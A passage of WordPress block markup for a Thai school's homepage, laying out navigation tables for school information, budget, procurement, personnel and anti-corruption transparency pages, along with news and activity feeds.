kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_3cdb23-c1\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=656\" data-type=\"page\" data-id=\"656\">วิสัยทัศน์/พันธกิจ/เป้าประสงค์</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_92a3d1-5f\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_92a3d1-5f\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">กรรมการสถานศึกษา</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_225b86-42\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_225b86-42\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=469\">ข้อมูลผู้บริหาร</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_e92ee9-59\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_e92ee9-59\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=605\" data-type=\"page\" data-id=\"605\">ข้อมูลบุคลากร</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_91c788-64\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_91c788-64\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=496\" data-type=\"link\" data-id=\"http://pakhaeng.ssk.in.th/?page_id=496\">ข้อมูลนักเรียน</a></span></li>\n<!-- /wp:kadence/listitem --></ul></div>\n<!-- /wp:kadence/iconlist -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"5157985b\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"75%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"e5e0c341\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":503,\"sizeSlug\":\"full\",\"linkDestination\":\"custom\"} -->\n<figure class=\"wp-block-image size-full\"><a href=\"http://eita.ssk.in.th/eit_admin.php\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/Is-It-a-Gift-Instagram-Post.png\" alt=\"\" class=\"wp-image-503\"/></a></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":758,\"sizeSlug\":\"full\",\"linkDestination\":\"custom\"} -->\n<figure class=\"wp-block-image size-full\"><a href=\"http://eita.ssk.in.th/eit_admin.php\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/2-2.png\" alt=\"\" class=\"wp-image-758\"/></a></figure>\n<!-- /wp:image -->\n\n<!-- wp:contentviews/grid1 {\"blockId\":\"9l7bo6vn\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"showTaxonomy\":false,\"showTitle\":false,\"showContent\":false,\"showReadmore\":false,\"showPagination\":true,\"postsPerPage\":\"2\",\"headingText\":\"วิดีโอกิจกรรมโรงเรียน\",\"headingStyle\":\"heading5\",\"headingHide\":false,\"category-terms\":[{\"label\":\"วิดีโอกิจกรรมโรงเรียน\",\"value\":\"%e0%b8%a7%e0%b8%b4%e0%b8%94%e0%b8%b5%e0%b9%82%e0%b8%ad%e0%b8%81%e0%b8%b4%e0%b8%88%e0%b8%81%e0%b8%a3%e0%b8%a3%e0%b8%a1%e0%b9%82%e0%b8%a3%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99\"}],\"headingBgColor\":\"#ff6900\"} /-->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"4b6444ee\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingTop\":\"30px\",\"paddingLeft\":\"10px\",\"paddingRight\":\"10px\"}} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"2467bce1\",\"columns\":2,\"horizontalGap\":30,\"verticalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"3094a446\",\"isGrid\":true,\"gridId\":\"2467bce1\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"25%\",\"widthMobile\":\"100%\"},\"spacing\":{\"paddingBottom\":\"\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/button {\"uniqueId\":\"e4387b97\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-e4387b97 gb-button-text\"><strong>ข้อมูลพื้นฐาน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><a href=\"http://pakhaeng.ssk.in.th/?page_id=546\">โครงสร้างและอำนาจหน้าที่</a></td></tr><tr><td><a href=\"http://pakhaeng.ssk.in.th/?page_id=469\">ข้อมูลผู้บริหาร</a></td></tr><tr><td><a href=\"http://pakhaeng.ssk.in.th/?page_id=362\" data-type=\"link\" data-id=\"http://pakhaeng.ssk.in.th/?page_id=362\">ข้อมูลการติดต่อ</a></td></tr><tr><td><a href=\"http://pakhaeng.ssk.in.th/?page_id=355\" data-type=\"page\" data-id=\"355\">ข่าวประชาสัมพันธ์</a></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"306e037f\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-306e037f gb-button-text\"><strong>การบริหารงานและการใช้จ่ายงบประมาณ</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td>แผนกลยุทธ์หรือแผนพัฒนาคุณภาพการศึกษาของสถานศึกษา</td></tr><tr><td>แผนปฏิบัติการและความก้าวหน้าในการดำเนินงานและการใช้งบประมาณประจำปี</td></tr><tr><td>คู่มือหรือแนวทางปฏิบัติงานของครู และบุคลากรทางการศึกษา</td></tr><tr><td>ข้อมูลเชิงสถิติการให้บริการ</td></tr><tr><td><a href=\"http://pakhaeng.ssk.in.th/?page_id=459\">E-Service</a></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8a5736ca\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8a5736ca gb-button-text\"><strong>การจัดซื้อจัดจ้าง</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td>รายการการจัดซื้อจัดจ้างหรือการจัดหาพัสดุและความก้าวหน้าการจัดซื้อจัดจ้างหรือการจัดหาพัสดุ ประจำปีงบประมาณ พ.ศ .2568</td></tr><tr><td>รายงานผลการจัดซื้อจัดจ้างหรือการจัดหาพัสดุประจำปี งบประมาณ พ.ศ .2567</td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8283a353\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8283a353 gb-button-text\"><strong>การบริหารและพัฒนาทรัพยากรบุคคล</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><a href=\"http://pakhaeng.ssk.in.th/?page_id=566\" data-type=\"page\" data-id=\"566\">แผนการบริหารและพัฒนาทรัพยากรบุคคล</a></td></tr><tr><td><a href=\"http://pakhaeng.ssk.in.th/?page_id=1003\" data-type=\"page\" data-id=\"1003\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=900\" data-type=\"page\" data-id=\"1003\">ประมวลจริยธรรม และการขับเคลื่อนจริยธรรม</a></a></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8e160f87\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8e160f87 gb-button-text\"><strong>การส่งเสริมความโปร่งใส</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><a href=\"http://pakhaeng.ssk.in.th/?page_id=712\" data-type=\"page\" data-id=\"712\">แนวปฏิบัติการจัดการเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</a></td></tr><tr><td><a href=\"http://pakhaeng.ssk.in.th/?page_id=476\">ช่องทางแจ้งเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</a></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"dd227e0e\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-dd227e0e gb-button-text\"><strong>การดำเนินการเพื่อป้องกันการทุจริตในประเด็นสินบน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><a href=\"http://pakhaeng.ssk.in.th/?page_id=859\" data-type=\"page\" data-id=\"859\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=859\" data-type=\"page\" data-id=\"859\">ประกาศเจตนารมณ์และการสร้างวัฒนธรรม ตามนโยบาย No Gift Policy จากการปฏิบัติหน้าที่</a></a></td></tr><tr><td><a href=\"http://pakhaeng.ssk.in.th/?page_id=828\">การประเมินความเสี่ยงที่อาจเกิดการให้หรือรับสินบนจากการดำเนินงานตามภารกิจของสถานศึกษา  ประจำปีงบประมาณ พ.ศ .2568</a></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"85986834\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-85986834 gb-button-text\"><strong>การส่งเสริมคุณธรรมและความโปร่งใส</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><a href=\"http://pakhaeng.ssk.in.th/?page_id=1010\" data-type=\"page\" data-id=\"1010\">แนวทาง/โครงการ/กิจกรรมการป้องกันการทุจริต</a></td></tr><tr><td>มาตรการส่งเสริมคุณธรรมและความโปร่งใสภายในสถานศึกษา</td></tr><tr><td></td></tr><tr><td></td></tr></tbody></table></figure>\n<!-- /wp:table --></div>\n<!-- /wp:group -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"07462550\",\"isGrid\":true,\"gridId\":\"2467bce1\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"75%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:contentviews/list1 {\"blockId\":\"bohtnagp\",\"gridGap\":{\"md\":0},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"showThumbnail\":false,\"showTaxonomy\":false,\"showContent\":false,\"showReadmore\":false,\"showMeta\":true,\"showPagination\":true,\"titleTag\":\"h6\",\"postsPerPage\":\"4\",\"headingText\":\"ข่าวประชาสัมพันธ์\",\"headingStyle\":\"heading5\",\"category-terms\":[{\"label\":\"ข่าวประชาสัมพันธ์\",\"value\":\"pr\"}],\"headingBgColor\":\"#ff6900\",\"titleHoverColor\":\"#ff6900\",\"titleBgColor\":\"#ffffff\",\"titleHoverBgColor\":\"#ffffff\",\"titleWeight\":\"500\",\"titlefStyle\":\"\",\"titleTran\":\"\",\"titleBorderStyle\":\"none\",\"titlefSize\":{\"md\":18}} /-->\n\n<!-- wp:contentviews/grid1 {\"blockId\":\"7dr8k85x\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":2,\"sm\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showContent\":false,\"showReadmore\":false,\"showMeta\":true,\"metaWhich\":[{\"value\":\"date\",\"label\":\"Date\"},{\"value\":\"author\",\"label\":\"Author\"},{\"value\":\"comment\",\"label\":\"Comment\"}],\"metaSeparator\":\"|\",\"showPagination\":true,\"imgSize\":\"large\",\"thumbnailHeight\":{\"md\":250,\"xs\":100},\"thumbnailHeightUnits\":{\"xs\":\"%\"},\"thumbnailEffect\":\"cveffect-darken\",\"postsPerPage\":\"4\",\"headingText\":\"ข่าวกิจกรรมโรงเรียน\",\"headingStyle\":\"heading5\",\"category-terms\":[{\"label\":\"ข่าวกิจกรรมโรงเรียน\",\"value\":\"%e0%b8%82%e0%b9%88%e0%b8%b2%e0%b8%a7%e0%b8%81%e0%b8%b4%e0%b8%88%e0%b8%81%e0%b8%a3%e0%b8%a3%e0%b8%a1%e0%b9%82%e0%b8%a3%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99\"}],\"headingColor\":\"#130b0b\",\"headingBgColor\":\"#ff6900\",\"headingWeight\":\"500\",\"headingfSize\":{\"md\":22},\"titleHoverColor\":\"#ff6900\",\"titleWeight\":\"500\",\"titlefSize\":{\"md\":16},\"titleLine\":{\"md\":30},\"taxotermfSize\":{\"md\":12}} /-->\n\n<!-- wp:contentviews/list1 {\"blockId\":\"8rsrezsy\",\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showTaxonomy\":false,\"taxoPosition\":\"over_top_left\",\"showContent\":false,\"metaSeparator\":\"|\",\"showPagination\":true,\"thumbnailMaxWidth\":{\"md\":40},\"thumbnailHeight\":{\"md\":200},\"thumbnailEffect\":\"cveffect-darken\",\"excerptLength\":\"10\",\"postsPerPage\":\"4\",\"headingText\":\"ผลงานนักเรียน/ครู\",\"headingStyle\":\"heading5\",\"category-terms\":[{\"label\":\"ผลงานนักเรียน/ครู\",\"value\":\"%e0%b8%9c%e0%b8%a5%e0%b8%87%e0%b8%b2%e0%b8%99%e0%b8%99%e0%b8%b1%e0%b8%81%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99-%e0%b8%84%e0%b8%a3%e0%b8%b9\"}],\"content-itemBorderRadius\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"meta-fieldsMargin\":{\"md\":{\"top\":\"10\",\"right\":\"10\",\"bottom\":\"10\",\"left\":\"10\"}},\"headingColor\":\"#000000\",\"headingBgColor\":\"#ff6900\",\"headingWeight\":\"500\",\"headingfSize\":{\"md\":20},\"thumbnailAllPadding\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"thumbnailAllBorderRadius\":{\"md\":{\"top\":\"3\",\"right\":\"3\",\"bottom\":\"3\",\"left\":\"3\"}},\"titleHoverColor\":\"#ff6900\",\"titleWeight\":\"500\",\"titlefSize\":{\"md\":16},\"titleLine\":{\"md\":30},\"titleMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}},\"readmoreColor\":\"#000000\",\"readmoreBgColor\":\"#eee9da\",\"readmoreMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}}} /-->\n\n<!-- wp:spacer {\"height\":\"30px\"} -->\n<div style=\"height:30px\" aria-hidden=\"true\" class=\"wp-block-spacer\"></div>\n<!-- /wp:spacer -->\n\n<!-- wp:contentviews/grid1 {\"blockId\":\"y6fpy3h2\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":3,\"sm\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showTaxonomy\":false,\"taxoPosition\":\"over_bottom_right\",\"showTitle\":false,\"showContent\":false,\"showReadmore\":false,\"metaWhich\":[{\"value\":\"date\",\"label\":\"Date\"},{\"value\":\"author\",\"label\":\"Author\"},{\"value\":\"comment\",\"label\":\"Comment\"}],\"metaSeparator\":\"\\u0026#8210;\",\"showPagination\":true,\"imgSize\":\"large\",\"thumbnailHeight\":{\"md\":300},\"thumbnailHeightUnits\":{\"md\":\"%\"},\"thumbnailEffect\":\"cveffect-darken\",\"postsPerPage\":\"3\",\"headingText\":\"วารสารประชาสัมพันธ์\",\"headingStyle\":\"heading4\",\"category-terms\":[{\"label\":\"วารสารประชาสัมพันธ์\",\"value\":\"%e0%b8%a7%e0%b8%b2%e0%b8%a3%e0%b8%aa%e0%b8%b2%e0%b8%a3%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%8a%e0%b8%b2%e0%b8%aa%e0%b8%b1%e0%b8%a1%e0%b8%9e%e0%b8%b1%e0%b8%99%e0%b8%98%e0%b9%8c\"}],\"viewBgColor\":\"#27ccc105\",\"headingBgColor\":\"#ff6900\",\"headingWeight\":\"500\",\"headingfSize\":{\"md\":22},\"paginationMargin\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"-40\",\"left\":\"\"}}} /-->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n\n<!-- wp:kadence/rowlayout {\"uniqueID\":\"14_74522c-22\",\"columns\":1,\"colLayout\":\"equal\",\"firstColumnWidth\":0,\"secondColumnWidth\":0,\"thirdColumnWidth\":0,\"fourthColumnWidth\":0,\"fifthColumnWidth\":0,\"sixthColumnWidth\":0,\"kbVersion\":2} -->\n<!-- wp:kadence/column {\"borderWidth\":[\"\",\"\",\"\",\"\"],\"uniqueID\":\"14_df8487-4e\",\"kbVersion\":2} -->\n<div class=\"wp-block-kadence-column kadence-column14_df8487-4e\"><div class=\"kt-inside-inner-col\"><!-- wp:kadence/tabs {\"uniqueID\":\"14_8c5230-93\",\"tabCount\":2,\"contentBgColor\":\"rgba(171,184,195,0.02)\",\"contentBorderStyles\":[{\"top\":[\"#bcbcbc\",\"\",1],\"right\":[\"#bcbcbc\",\"\",1],\"bottom\":[\"#bcbcbc\",\"\",1],\"left\":[\"#bcbcbc\",\"\",1],\"unit\":\"px\"}],\"tabAlignment\":\"center\",\"titles\":[{\"text\":\"E-SERVICE\",\"icon\":\"fe_box\",\"iconSide\":\"left\",\"onlyIcon\":false,\"subText\":\"\",\"anchor\":\"\"},{\"text\":\"เมนูระบบบริการ\",\"icon\":\"fe_airplay\",\"iconSide\":\"left\",\"onlyIcon\":false,\"subText\":\"\",\"anchor\":\"\"}],\"titleColor\":\"#000000\",\"titleColorHover\":\"#f78da7\",\"titleColorActive\":\"#ff6900\",\"titleBg\":\"var(\\u002d\\u002dglobal-palette9, #ffffff)\",\"titleBgHover\":\"#ffffff\",\"titleBgActive\":\"#ffffff\",\"titleBorder\":\"#ffffff\",\"titleBorderHover\":\"#8ed1fc\",\"titleBorderActive\":\"#8ed1fc\",\"titleBorderWidth\":[1,1,0,1],\"titleBorderRadius\":[4,4,0,0],\"titlePadding\":[8,20,8,20],\"titleMargin\":[0,8,-1,0],\"size\":\"1.299\",\"sizeType\":\"em\",\"lineHeight\":1.4,\"lineType\":\"em\",\"tabSize\":\"\",\"mobileSize\":\"\",\"fontWeight\":\"400\",\"widthType\":\"percent\",\"tabWidth\":[3,\"\",\"\"],\"gutter\":[0,\"\",\"\"]} -->\n<div class=\"wp-block-kadence-tabs alignnone\"><div class=\"kt-tabs-wrap kt-tabs-id14_8c5230-93 kt-tabs-has-2-tabs kt-active-tab-1 kt-tabs-layout-tabs kt-tabs-tablet-layout-inherit kt-tabs-mobile-layout-inherit kt-tab-alignment-center \"><ul class=\"kt-tabs-title-list kb-tabs-list-columns kb-tab-title-columns-3\"><li id=\"tab-e-service\" class=\"kt-title-item kt-title-item-1 kt-tabs-svg-show-always kt-tabs-icon-side-left kt-tab-title-active\"><a href=\"#tab-e-service\" data-tab=\"1\" class=\"kt-tab-title kt-tab-title-1 